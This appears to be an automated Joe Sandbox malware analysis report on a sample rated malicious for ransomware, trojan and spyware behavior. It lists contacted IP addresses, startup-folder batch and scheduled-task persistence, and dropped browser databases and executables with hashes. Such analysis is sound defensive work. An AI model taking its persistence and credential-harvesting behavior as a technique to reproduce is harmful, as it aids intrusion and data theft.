64.157.16.43 | unknown | United States | 3064 | AFFINITY-FTLUS | false
50.169.37.50 | unknown | United States | 7922 | COMCAST-7922US | false
182.160.100.156 | unknown | Bangladesh | 24323 | AAMRA-NETWORKS-AS-APaamranetworkslimitedBD | false
103.216.51.36 | unknown | Cambodia | 135375 | TCC-AS-APTodayCommunicationCoLtdKH | false
78.90.252.7 | unknown | Bulgaria | 20911 | NETSURF-AS-BG | false
182.253.172.111 | unknown | Indonesia | 17451 | BIZNET-AS-APBIZNETNETWORKSID | false
51.15.139.15 | unknown | France | 12876 | OnlineSASFR | false
181.78.11.217 | unknown | Argentina | 52468 | UFINETPANAMASAPA | false
194.44.177.225 | unknown | Ukraine | 3255 | UARNET-ASUARNetUA | false
89.168.121.175 | unknown | United Kingdom | 9105 | TISCALI-UKTalkTalkCommunicationsLimitedGB | false
181.78.11.218 | unknown | Argentina | 52468 | UFINETPANAMASAPA | false
85.113.47.102 | unknown | Russian Federation | 34533 | ESAMARA-ASRU | false
85.237.62.189 | unknown | Russian Federation | 12389 | ROSTELECOM-ASRU | false
41.155.190.214 | unknown | Egypt | 37069 | MOBINILEG | false
13.234.24.116 | unknown | United States | 16509 | AMAZON-02US | false
139.255.193.243 | unknown | Indonesia | 9905 | LINKNET-ID-APLinknetASNID | false
159.65.0.189 | unknown | United States | 14061 | DIGITALOCEAN-ASNUS | false
103.81.196.125 | unknown | Bangladesh | 55492 | DFN-BDDhakaFiberNetLimitedBD | false
180.178.104.110 | unknown | Indonesia | 38758 | HYPERNET-AS-IDPTHIPERNETINDODATAID | false
31.43.63.70 | unknown | Ukraine | 50581 | UTGUA | false
103.74.229.133 | unknown | Bangladesh | 131340 | TAQWAIT-AS-APMdMozammelHoquetaTaqwaITBD | false
52.35.240.119 | unknown | United States | 16509 | AMAZON-02US | false
45.172.177.253 | unknown | Argentina | 267791 | INTERMEDIABUSINESSSOLUTIONSSRLAR | false
68.183.17.152 | unknown | United States | 14061 | DIGITALOCEAN-ASNUS | false
119.15.89.87 | unknown | Cambodia | 24492 | IIT-WICAM-AS-APWiCAMCorporationLtdKH | false
103.25.210.102 | unknown | Indonesia | 132653 | B-LINK-AS-IDPTTransdataSejahteraID | false
221.194.149.8 | unknown | China | 4837 | CHINA169-BACKBONECHINAUNICOMChina169BackboneCN | false
101.51.121.29 | unknown | Thailand | 23969 | TOT-NETTOTPublicCompanyLimitedTH | false
146.19.106.42 | unknown | France | 7726 | FITC-ASUS | false
51.81.89.146 | unknown | United States | 16276 | OVHFR | false
114.129.2.82 | unknown | Japan | 7671 | MCNETNTTSmartConnectCorporationJP | false
46.17.63.166 | unknown | United Kingdom | 39326 | HSO-GROUPGB | false
51.79.248.215 | unknown | Canada | 16276 | OVHFR | false
103.216.50.143 | unknown | Cambodia | 135375 | TCC-AS-APTodayCommunicationCoLtdKH | false
62.171.131.101 | unknown | United Kingdom | 51167 | CONTABODE | false
103.220.205.162
                                                                                                                                                                                                                                unknownBangladesh
                                                                                                                                                                                                                                59362KSNETWORK-AS-APKSNetworkLimitedBDfalse
                                                                                                                                                                                                                                103.47.93.250
                                                                                                                                                                                                                                unknownIndia
                                                                                                                                                                                                                                9830SWIFTONLINE-AS-APSWIFTONLINEBORDERASINfalse
                                                                                                                                                                                                                                183.164.254.8
                                                                                                                                                                                                                                unknownChina
                                                                                                                                                                                                                                4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                                                                                                                                                                                                                                194.9.80.1
                                                                                                                                                                                                                                unknownunknown
                                                                                                                                                                                                                                206495IR-SADRA-20180529IRfalse
                                                                                                                                                                                                                                212.110.188.222
                                                                                                                                                                                                                                unknownUnited Kingdom
                                                                                                                                                                                                                                35425BYTEMARK-ASGBfalse
                                                                                                                                                                                                                                103.47.93.248
                                                                                                                                                                                                                                unknownIndia
                                                                                                                                                                                                                                9830SWIFTONLINE-AS-APSWIFTONLINEBORDERASINfalse
                                                                                                                                                                                                                                201.163.73.93
                                                                                                                                                                                                                                unknownMexico
                                                                                                                                                                                                                                11172AlestraSdeRLdeCVMXfalse
                                                                                                                                                                                                                                202.162.105.202
                                                                                                                                                                                                                                unknownSingapore
                                                                                                                                                                                                                                64050BCPL-SGBGPNETGlobalASNSGfalse
                                                                                                                                                                                                                                67.205.177.122
                                                                                                                                                                                                                                unknownUnited States
                                                                                                                                                                                                                                14061DIGITALOCEAN-ASNUSfalse
                                                                                                                                                                                                                                212.110.188.220
                                                                                                                                                                                                                                unknownUnited Kingdom
                                                                                                                                                                                                                                35425BYTEMARK-ASGBfalse
                                                                                                                                                                                                                                94.182.26.44
                                                                                                                                                                                                                                unknownIran (ISLAMIC Republic Of)
                                                                                                                                                                                                                                31549RASANAIRfalse
                                                                                                                                                                                                                                50.233.240.87
                                                                                                                                                                                                                                unknownUnited States
                                                                                                                                                                                                                                7922COMCAST-7922USfalse
                                                                                                                                                                                                                                38.253.88.242
                                                                                                                                                                                                                                unknownUnited States
                                                                                                                                                                                                                                174COGENT-174USfalse
                                                                                                                                                                                                                                172.67.200.220
                                                                                                                                                                                                                                unknownUnited States
                                                                                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                13.59.156.167
                                                                                                                                                                                                                                unknownUnited States
                                                                                                                                                                                                                                16509AMAZON-02USfalse
                                                                                                                                                                                                                                38.242.199.111
                                                                                                                                                                                                                                unknownUnited States
                                                                                                                                                                                                                                36336NATIXISUSfalse
                                                                                                                                                                                                                                74.103.66.15
                                                                                                                                                                                                                                unknownUnited States
                                                                                                                                                                                                                                701UUNETUSfalse
                                                                                                                                                                                                                                91.185.84.228
                                                                                                                                                                                                                                unknownRussian Federation
                                                                                                                                                                                                                                49816CMST-VOLGA-SIMBIRSKASRUfalse
                                                                                                                                                                                                                                175.101.15.41
                                                                                                                                                                                                                                unknownIndia
                                                                                                                                                                                                                                17754EXCELL-ASExcellmediaINfalse
                                                                                                                                                                                                                                219.73.88.167
                                                                                                                                                                                                                                unknownHong Kong
                                                                                                                                                                                                                                4760HKTIMS-APHKTLimitedHKfalse
                                                                                                                                                                                                                                212.110.188.216
                                                                                                                                                                                                                                unknownUnited Kingdom
                                                                                                                                                                                                                                35425BYTEMARK-ASGBfalse
                                                                                                                                                                                                                                212.110.188.211
                                                                                                                                                                                                                                unknownUnited Kingdom
                                                                                                                                                                                                                                35425BYTEMARK-ASGBfalse
                                                                                                                                                                                                                                103.47.93.236
                                                                                                                                                                                                                                unknownIndia
                                                                                                                                                                                                                                9830SWIFTONLINE-AS-APSWIFTONLINEBORDERASINfalse
                                                                                                                                                                                                                                128.199.104.93
                                                                                                                                                                                                                                unknownUnited Kingdom
                                                                                                                                                                                                                                14061DIGITALOCEAN-ASNUSfalse
                                                                                                                                                                                                                                212.110.188.213
                                                                                                                                                                                                                                unknownUnited Kingdom
                                                                                                                                                                                                                                35425BYTEMARK-ASGBfalse
                                                                                                                                                                                                                                183.215.23.242
                                                                                                                                                                                                                                unknownChina
                                                                                                                                                                                                                                56047CMNET-HUNAN-APChinaMobilecommunicationscorporationCNfalse
                                                                                                                                                                                                                                35.207.123.94
                                                                                                                                                                                                                                unknownUnited States
                                                                                                                                                                                                                                19527GOOGLE-2USfalse
                                                                                                                                                                                                                                103.189.96.98
                                                                                                                                                                                                                                unknownunknown
                                                                                                                                                                                                                                7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNefalse
                                                                                                                                                                                                                                162.144.32.209
                                                                                                                                                                                                                                unknownUnited States
                                                                                                                                                                                                                                46606UNIFIEDLAYER-AS-1USfalse
                                                                                                                                                                                                                                45.249.79.190
                                                                                                                                                                                                                                unknownIndia
                                                                                                                                                                                                                                18229CTRLS-AS-INCtrlSDatacentersLtdINfalse
                                                                                                                                                                                                                                102.132.55.250
                                                                                                                                                                                                                                unknownSouth Africa
                                                                                                                                                                                                                                327996ACCELERITZAfalse
                                                                                                                                                                                                                                148.72.23.56
                                                                                                                                                                                                                                unknownUnited States
                                                                                                                                                                                                                                26496AS-26496-GO-DADDY-COM-LLCUSfalse
                                                                                                                                                                                                                                188.40.44.95
                                                                                                                                                                                                                                unknownGermany
                                                                                                                                                                                                                                24940HETZNER-ASDEfalse
                                                                                                                                                                                                                                188.163.170.130
                                                                                                                                                                                                                                unknownUkraine
                                                                                                                                                                                                                                15895KSNET-ASUAfalse
                                                                                                                                                                                                                                186.190.225.152
                                                                                                                                                                                                                                unknownColombia
                                                                                                                                                                                                                                262186TVAZTECASUCURSALCOLOMBIACOfalse
                                                                                                                                                                                                                                81.250.223.126
                                                                                                                                                                                                                                unknownFrance
                                                                                                                                                                                                                                3215FranceTelecom-OrangeFRfalse
                                                                                                                                                                                                                                218.252.244.126
                                                                                                                                                                                                                                unknownHong Kong
                                                                                                                                                                                                                                9908HKCABLE2-HK-APHKCableTVLtdHKfalse
                                                                                                                                                                                                                                89.165.40.8
                                                                                                                                                                                                                                unknownIran (ISLAMIC Republic Of)
                                                                                                                                                                                                                                39501NGSASIRfalse
IP               Domain   Country             ASN     ASN Name / Country Code                                  Malicious
47.236.56.214    unknown  United States       20115   CHARTER-20115US                                          false
212.110.188.204  unknown  United Kingdom      35425   BYTEMARK-ASGB                                            false
191.101.1.116    unknown  Chile               61317   ASDETUKhttpwwwheficedcomGB                               false
94.131.14.66     unknown  Ukraine             29632   NASSIST-ASGI                                             false
92.119.74.249    unknown  Slovenia            205715  AS-FITELNETWORKES                                        false
212.110.188.207  unknown  United Kingdom      35425   BYTEMARK-ASGB                                            false
1.55.241.4       unknown  Viet Nam            18403   FPT-AS-APTheCorporationforFinancingPromotingTechnolo     false
23.111.102.153   unknown  Russian Federation  7979    SERVERS-COMUS                                            false
103.47.93.223    unknown  India               9830    SWIFTONLINE-AS-APSWIFTONLINEBORDERASIN                   false
113.74.26.114    unknown  China               4134    CHINANET-BACKBONENo31Jin-rongStreetCN                    false
104.17.9.114     unknown  United States       13335   CLOUDFLARENETUS                                          false
45.235.16.121    unknown  Brazil              267406  AGOBrasilInternetLtdaBR                                  false
168.227.11.135   unknown  Brazil              28201   CompanhiaItabiranaTelecomunicacoesLtdaBR                 false
5.161.144.46     unknown  Germany             24940   HETZNER-ASDE                                             false
200.174.198.95   unknown  Brazil              4230    CLAROSABR                                                false
183.88.122.200   unknown  Thailand            45758   TRIPLETNET-AS-APTripleTInternetTripleTBroadbandTH        false
45.71.15.136     unknown  Brazil              267595  MILANINNETBR                                             false
180.104.0.161    unknown  China               137702  CHINATELECOM-JIANGSU-NANJING-IDCNanjingJiangsuProvince   false
124.106.228.30   unknown  Philippines         9299    IPG-AS-APPhilippineLongDistanceTelephoneCompanyPH        false
104.236.0.129    unknown  United States       14061   DIGITALOCEAN-ASNUS                                       false
110.77.236.112   unknown  Thailand            131090  CAT-IDC-4BYTENET-AS-APCATTELECOMPublicCompanyLtdCATT     false
103.47.93.218    unknown  India               9830    SWIFTONLINE-AS-APSWIFTONLINEBORDERASIN                   false
54.67.125.45     unknown  United States       16509   AMAZON-02US                                              false
14.232.235.13    unknown  Viet Nam            45899   VNPT-AS-VNVNPTCorpVN                                     false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1407460
Start date and time: 2024-03-12 11:26:11 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 14m 49s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 45
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.rans.troj.spyw.expl.evad.winEXE@200/533@0/100
EGA Information:
• Successful, ratio: 83.3%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 264
• Number of non-executed functions: 207
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
• Execution Graph export aborted for target InstallUtil.exe, PID 44324 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtQueryVolumeInformationFile calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• Report size getting too big, too many NtWriteVirtualMemory calls found.
• Skipping network analysis since the amount of network traffic is too extensive
• VT rate limit hit for: file.exe
Time      Type             Description
10:28:33  Task Scheduler   Run new task: MalayamaraUpdate path: "C:\Users\user\AppData\Local\Temp\Updater.exe"
10:29:38  Task Scheduler   Run new task: Opera scheduled Autoupdate 1710239369 path: C:\Users\user\AppData\Local\Programs\Opera\autoupdate\opera_autoupdate.exe s>--scheduledtask --bypasslauncher $(Arg0)
11:27:09  API Interceptor  2x Sleep call for process: svchost.exe modified
11:27:11  API Interceptor  92x Sleep call for process: file.exe modified
11:27:28  API Interceptor  400x Sleep call for process: InstallUtil.exe modified
11:27:29  API Interceptor  33x Sleep call for process: powershell.exe modified
11:27:31  Autostart        Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CAjdcCiGIZYnFjRUzQZOkZkX.bat
11:27:44  Autostart        Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dArYapieKDS3mOriXwVea1ZH.bat
11:28:03  Autostart        Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kk0tFcBxArqNuZLONVKNccQ9.bat
11:28:21  API Interceptor  58x Sleep call for process: weblinkanalyzer.exe modified
11:28:35  Autostart        Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0c2kEPMEoB7jKNmSTYgGEhkC.bat
11:28:36  API Interceptor  1x Sleep call for process: f68SQOWBvY0lqnWRcqakARDI.exe modified
11:28:55  Autostart        Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0IVfGkpQqbTNp1pNVMpRFWtI.bat
                                                                                                                                                                                                                                11:28:59API Interceptor1x Sleep call for process: 23jzBT2gZ2W4aFsNb8WtTEfu.exe modified
                                                                                                                                                                                                                                11:29:09AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0vemidTikN0VMvyyqgfUpM9G.bat
                                                                                                                                                                                                                                11:29:31AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\15kxO4axYz87tjx2F18yoEOB.bat
                                                                                                                                                                                                                                11:29:54AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\296oUdYAJhNvgZMPkFJ8Adyi.bat
                                                                                                                                                                                                                                11:30:06AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2BAkuvvH6sPJYNmpYSkgEcI5.bat
Process: C:\Users\user\AppData\Local\Temp\syncUpd.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category: dropped
Size (bytes): 28672
Entropy (8bit): 2.5793180405395284
Encrypted: false
SSDEEP: 96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5: 41EA9A4112F057AE6BA17E2838AEAC26
SHA1: F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256: CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512: 29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious: false
Reputation: unknown
Preview: SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\user\AppData\Local\Temp\syncUpd.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category: dropped
Size (bytes): 40960
Entropy (8bit): 0.8553638852307782
Encrypted: false
SSDEEP: 48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5: 28222628A3465C5F0D4B28F70F97F482
SHA1: 1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256: 93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512: C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious: false
Reputation: unknown
Preview: SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\user\AppData\Local\Temp\syncUpd.exe
File Type: ASCII text, with very long lines (1024), with CRLF line terminators
Category: dropped
Size (bytes): 1026
Entropy (8bit): 4.694985340190863
Encrypted: false
SSDEEP: 24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
MD5: C9386BC43BF8FA274422EB8AC6BAE1A9
SHA1: 2CBDE59ADA19F0389A4C482667EC370D68F51049
SHA-256: F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
SHA-512: 7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
Malicious: false
Reputation: unknown
Process: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 2075202
Entropy (8bit): 7.195175286859034
Encrypted: false
SSDEEP: 49152:tQrflO1c7ZHq97qoPkIb/xBxlKemLLZOyt07l97T6/K5Pu:tQNMclHq9WSrxBxlKemXC7D7GYu
MD5: B0E9D3290621648878CA0D486C60F951
SHA1: 7979A79D81472ACF1A0C14F54AE4E39F94DFB619
SHA-256: BCA8B1774E21704B6DF8771D09C76CD3E18CC704D0BBD30829DA3D230808AF4A
SHA-512: C68E5110C0BF159EF10AF8CEF92CD4DC122C9C5183D49973D62DB0D59A8E74FBAFE9342593DBAC52EC2CBBA08B3B0ABDE7131602B0C03D38832601E2EB1CE436
Malicious: true
Yara Hits:
• Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\DirectSoundDriver 2.36.198.67\DirectSoundDriver 2.36.198.67.exe, Author: Joe Security
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: unknown
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...d.i^..........'................. .............@.....................................................................................h............................................................................................................................text............................... ..`.rdata...1.......@..................@..@.data....T... ...0... ..............@....rsrc.... ....... ...P..............@..@.short2..@......B:...p..............`...........................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\user\AppData\Local\Temp\syncUpd.exe
File Type: SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category: dropped
Size (bytes): 49152
Entropy (8bit): 0.8180424350137764
Encrypted: false
SSDEEP: 96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5: 349E6EB110E34A08924D92F6B334801D
SHA1: BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256: C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512: 2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious: false
Reputation: unknown
Preview: SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\user\AppData\Local\Temp\syncUpd.exe
File Type: SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category: dropped
                                                                                                                                                                                                                                Size (bytes):114688
                                                                                                                                                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\syncUpd.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):106496
                                                                                                                                                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\syncUpd.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.692693183518806
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                                                                                                                                                                                MD5:78F042E25B7FAF970F75DFAA81955268
                                                                                                                                                                                                                                SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                                                                                                                                                                                SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                                                                                                                                                                                SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview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
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\syncUpd.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):98304
                                                                                                                                                                                                                                Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\syncUpd.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):5242880
                                                                                                                                                                                                                                Entropy (8bit):0.037963276276857943
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                                                                                                                                                                MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                                                                                                                                                                SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                                                                                                                                                                SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                                                                                                                                                                SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\syncUpd.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.699548026888946
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                                                                                                                                                                                MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                                                                                                                                                                                SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                                                                                                                                                                                SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                                                                                                                                                                                SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview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
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\syncUpd.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.699548026888946
                                                                                                                                                                                                                                Encrypted:false
